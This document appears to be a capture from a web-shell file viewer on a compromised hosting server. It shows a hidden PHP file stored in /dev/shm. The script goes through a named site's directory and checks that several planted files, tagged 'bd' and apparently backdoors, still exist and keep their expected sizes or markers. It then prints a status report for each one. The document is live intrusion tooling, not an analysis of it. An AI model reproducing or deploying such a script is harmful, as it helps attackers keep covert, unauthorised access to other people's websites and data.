| Linux server165.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 Path : /proc/self/root/dev/shm/ |
| Current File : //proc/self/root/dev/shm/.parameter_group |
<?php $r = '/home/trafmofp/media-advisor.com'; $x = ["/mediaadvisor/ordering.php"=>"bd@@274085714@@7",
"/phpmailer/printanswers.php"=>"bd@@273400098@@94",
"/phpmailer/printanswers.php"=>"bd@@273398820@@1687",
"/mediaadvisor/ordering.php"=>"bd@@274084170@@978",
"/phpmailer/Time.php"=>"bd@@274021651@@79",
"/about.php"=>"bd@@274234107@@52"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');